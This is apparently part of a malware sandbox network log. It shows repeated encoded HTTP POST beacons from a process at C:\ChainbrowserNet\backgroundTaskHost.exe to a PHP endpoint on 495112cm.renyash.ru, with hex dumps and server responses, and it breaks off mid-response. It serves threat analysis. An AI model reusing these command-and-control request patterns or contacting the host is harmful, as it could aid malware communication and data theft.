                                                                                          Data Ascii: QY[TP__S\[RXWZX\XWZSRUQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.@=D (6%$=1#=5]&.3R7=6R+,+674-++!Y#!Y,>
                                                                                          Jan 4, 2025 11:08:53.596801996 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:53.775728941 CET800INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:53 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q91bVlKSs6Ewcz0eN2TM05MyIKIk5cM67Br2mwrKGFqSlvNozPXg8PLrX4%2B9BUXIyO52o2NvEnrQU2hgtw7GCw6P1TkxnhDfv3UL6FBp29krR6XZDYze2PeiQr2lGczfzFuzgyrB"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e0eba7e4297-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3866&min_rtt=1728&rtt_var=4925&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2809&delivery_rate=77502&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          92192.168.2.450100104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:53.907970905 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:54.264627934 CET2520OUTData Raw: 54 5e 5e 50 55 59 5a 5c 5c 5b 52 58 57 5f 58 5f 58 53 5a 5f 52 57 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T^^PUYZ\\[RXW_X_XSZ_RWQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-= "821 =<)#=&-7P#>R+<(&8#-=*+!Y#!Y,2
                                                                                          Jan 4, 2025 11:08:54.375998974 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:54.553056955 CET806INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:54 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FZwu7bOxw7gEe9LwXMefRB3ne6Pg%2FSotoChVnDTVqK4Fpd1jtfihlVxBOOxO%2BnizmYKEwEnixLETt4Hp31SyaQFNoAsA4Y3IYfqbN9DX%2FBkpZ9Vi0PhsTybSEGLOlKzMQSlIbm3y"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e1388c042a6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4602&min_rtt=1721&rtt_var=6407&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=58942&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          93192.168.2.450101104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:54.845889091 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:55.201858044 CET2520OUTData Raw: 51 5e 5e 5f 55 5e 5a 54 5c 5b 52 58 57 59 58 5c 58 5c 5a 5f 52 52 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q^^_U^ZT\[RXWYX\X\Z_RRQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-(*?A"8%V%37=,1Y!'.#!<?<(@'4[:)+!Y#!Y,*
                                                                                          Jan 4, 2025 11:08:55.310425043 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:55.581310034 CET809INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:55 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DacNiJxWQ5VyOrlkYeHih8MBLAzaAFcHzD5fpHic2xvh7u7L%2BWfSs782Nzw8h0zps3JgKd%2BkLrsPfWRsjTq%2FFu%2F8F%2BKPGC7Tuh9HtVIT6dLSGBBTVUuqnawDJZXS6Th86tqNuTMS"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e196ce4435c-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2850&min_rtt=1619&rtt_var=3069&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=127310&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          94192.168.2.450102104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:55.706701040 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:56.063196898 CET2520OUTData Raw: 54 5b 5e 5e 55 5d 5a 56 5c 5b 52 58 57 52 58 5a 58 53 5a 5c 52 52 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T[^^U]ZV\[RXWRXZXSZ\RRQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.D=,4^6%#^(<["[=X0#4.!(,'Y(&##=*!Y#!Y,
                                                                                          Jan 4, 2025 11:08:57.109533072 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:57.109603882 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:57.109710932 CET808INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:56 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mv7a8ee5FN%2Fo3KnpULn7seTVO%2BFP%2FuBHNNwVLaJP5gES5Az0DGRGxho%2FpJVuvRQZvFCGDoIGyH6Ma3qkG2vyL4GxuZyXmUKpNEHGVd8MHtl%2F5FbTpSMrJkRxgId1uhOND1Evb8GL"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e1eba447287-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3560&min_rtt=1960&rtt_var=3936&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=98869&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0
                                                                                          Jan 4, 2025 11:08:57.109790087 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:57.300827026 CET833INHTTP/1.1 100 Continue
                                                                                          Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 30 34 20 4a 61 6e 20 32 30 32 35 20 31 30 3a 30 38 3a 35 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 63 66 2d 63 61 63 68 65 2d 73 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 4d 76 37 61 38 65 65 35 46 4e 25 32 46 6f 33 4b 6e 70 55 4c 6e 37 73 65 54 56 4f 25 32 42 46 50 25 32 46 75 42 48 4e 4e 77 56 4c 61 4a 50 35 67 45 53 35 41 7a 30 44 47 52 47 78 68 6f 25 32 46 70 4a 56 75 76 52 51 5a 76 46 43 47 44 6f 49 47 79 48 36 4d 61 33 71 6b [TRUNCATED]
                                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sat, 04 Jan 2025 10:08:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mv7a8ee5FN%2Fo3KnpULn7seTVO%2BFP%2FuBHNNwVLaJP5gES5Az0DGRGxho%2FpJVuvRQZvFCGDoIGyH6Ma3qkG2vyL4GxuZyXmUKpNEHGVd8MHtl%2F5FbTpSMrJkRxgId1uhOND1Evb8GL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fca6e1eba447287-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3560&min_rtt=1960&rtt_var=3936&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=98869&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          95192.168.2.450103104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:57.301697969 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:57.654903889 CET2520OUTData Raw: 51 5c 5e 5f 50 5c 5f 51 5c 5b 52 58 57 5b 58 5a 58 54 5a 5f 52 50 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\^_P\_Q\[RXW[XZXTZ_RPQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.B*(7%#Y)!=\'X44)/'Y(&3#%)!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:57.777987957 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:57.960460901 CET815INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:57 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tLM%2FKQ88RYjPhM%2F3yUYC8zinSX9YONGFLdeOMaDBKumyZT%2B6PDi8%2FihwsXQOLurplXgd0Llcw%2BayeLMC%2BdE3UJRUS3jmrdltSM%2B4RQmSVncq49cM2%2BIbyNHffjNpdEUFOu4nZjT7"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e28cb3b4282-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3216&min_rtt=1743&rtt_var=3600&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=107908&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          96192.168.2.450104104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:58.030967951 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1820
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:58.389277935 CET1820OUTData Raw: 54 58 5b 53 55 5b 5a 57 5c 5b 52 58 57 5e 58 5f 58 55 5a 5c 52 51 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX[SU[ZW\[RXW^X_XUZ\RQQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z->9?7110;>%\![%['.7 =<<,+'7">;!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:58.498950958 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:58.759396076 CET958INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:58 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BRFl5p1yXdPYeHw5f5qa5br5Brba4uB%2F8K54KgcesYaDFvW0GycT7suI9GOeH5fvEwUBMPyDqQ0mBDenqnryqbqiO9dUZJjGtZr7VZhW8liv%2BZMExqGwVNFglDS2CFEhP%2F3U%2BNJu"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e2d4caa7c8e-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7740&min_rtt=1911&rtt_var=12376&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2137&delivery_rate=30072&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0f 2b 58 38 55 35 3f 34 12 29 58 31 07 26 20 28 12 2c 22 38 03 34 05 20 06 2c 0b 25 59 30 0d 06 5e 2a 3f 28 57 34 30 27 57 33 0a 2a 5d 06 12 38 12 3f 05 3a 58 25 2b 0b 0d 2a 0b 31 1c 33 35 25 06 24 2e 30 05 3e 3c 0f 5d 25 3f 21 1f 2b 2f 25 07 3a 2a 0e 40 38 3f 37 08 36 13 21 53 08 13 20 55 26 21 20 0e 29 20 14 00 27 20 36 00 33 03 2f 57 2a 28 02 19 27 07 36 5c 2e 22 3c 00 3f 0a 38 1f 3a 10 20 5b 3f 07 24 0d 27 06 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98'+X8U5?4)X1& (,"84 ,%Y0^*?(W40'W3*]8?:X%+*135%$.0><]%?!+/%:*@8?76!S U&! ) ' 63/W*('6\."<?8: [?$'"\ #V=WL0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          97192.168.2.450105104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:58.340838909 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:58.686181068 CET2520OUTData Raw: 51 5d 5b 50 50 58 5f 50 5c 5b 52 58 57 5d 58 5b 58 57 5a 58 52 57 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q][PPX_P\[RXW]X[XWZXRWQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.)@"8!Q1?(,:"=:'S4>!)/ (& -*!Y#!Y,
                                                                                          Jan 4, 2025 11:08:58.784904957 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:59.051395893 CET816INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:59 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LclDkxW2us7qYifwmgqf%2Bx%2FU8dEgJ9iB2%2BRpp2vF4o91gSC4X9UQQ8boRi%2FDjUJPeo26gKara%2FEb9nJfVClKKsb%2F9FV0zmCy%2BXIZxeUE1YFrFHs5LkwvS%2FsuzlXrmiQOa3wNsk%2B2"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e2f1c93420a-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3648&min_rtt=1680&rtt_var=4566&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=83782&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          98192.168.2.450106104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:59.173322916 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:59.533533096 CET2512OUTData Raw: 51 5a 5e 52 55 59 5f 51 5c 5b 52 58 57 5a 58 5a 58 57 5a 5c 52 57 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ^RUY_Q\[RXWZXZXWZ\RWQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.E)9?"+9&3?^)/9Z5>9]$>##>)?+^<&44=:_=;!Y#!Y,*
                                                                                          Jan 4, 2025 11:08:59.636214972 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:59.814384937 CET801INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:59 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pegVDJIafbWFDgffLmzvpIWheEk4o9yvaxTmkjIGknfkuxkW9eCo7bA2rCeCfo5ELONzZouW2m4HpmX8RbbE0G2%2BCM8dKgpdrICw0E82PBKaViy2cCzcehMKpJiGUdUE2Mxt3Uwx"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e346ec8425b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3109&min_rtt=1615&rtt_var=3595&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2805&delivery_rate=107558&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          99192.168.2.450107104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:59.940064907 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:00.295586109 CET2520OUTData Raw: 54 5c 5b 54 50 5f 5a 50 5c 5b 52 58 57 58 58 59 58 5d 5a 58 52 51 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T\[TP_ZP\[RXWXXYX]ZXRQQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.=)'#(%?*<Y6=:'.$49)/<+;"=^=!Y#!Y,.
                                                                                          Jan 4, 2025 11:09:00.408482075 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:00.585217953 CET802INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:00 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
